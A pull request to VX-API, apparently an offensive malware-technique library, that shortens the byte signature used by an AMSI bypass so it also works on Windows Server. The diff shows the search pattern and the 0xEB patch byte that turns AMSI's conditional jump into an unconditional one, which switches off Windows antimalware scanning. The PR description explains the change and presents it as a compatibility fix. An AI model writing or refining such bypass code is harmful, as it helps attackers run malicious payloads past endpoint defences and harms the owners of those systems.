### PR TITLE
Update pattern to work on Windows Server versions

### DIFF
--- a/VX-API/AmsiBypassViaPatternScan.cpp
+++ b/VX-API/AmsiBypassViaPatternScan.cpp
@@ -2,7 +2,7 @@
 
 typedef HRESULT(WINAPI* AMSIOPENSESSION)(HAMSICONTEXT, HAMSISESSION*);
 
-BYTE AmsiPattern[] = { 0x48,'?','?', 0x74,'?',0x48,'?' ,'?' ,0x74,'?' ,0x48,'?' ,'?' ,'?' ,'?',0x74,0x33 };
+BYTE AmsiPattern[] = { 0x48,'?','?', 0x74,'?',0x48,'?' ,'?' ,0x74 };
 UCHAR AmsiPatch[] = { 0xeb };
 
 ULONGLONG UnusedSubroutineSearchAmsiPattern(PBYTE Address, DWORD Size, PBYTE Pattern, DWORD PatternSize)


### PR DESCRIPTION
I have updated the pattern to work on both Windows Desktop and Windows Server versions. In Windows Server versions, the 
pattern was causing compatibility issues due to a change in the 10th byte. The previous pattern was
 `{ 0x48,'?','?', 0x74,'?',0x48,'?' ,'?' ,0x74,'?' ,0x48,'?' ,'?' ,'?' ,'?',0x74,0x33 }`, 

![image](https://user-images.githubusercontent.com/60795188/222783967-5b12d7ad-79fc-4fba-9684-c02235005c5e.png)

I have updated the pattern to `{ 0x48,'?','?', 0x74,'?',0x48,'?' ,'?' ,0x74 }` which is now compatible with both Windows Desktop and Windows Server versions.

![image](https://user-images.githubusercontent.com/60795188/222784966-32b399f7-120b-4dab-9d57-1f5407313d25.png)
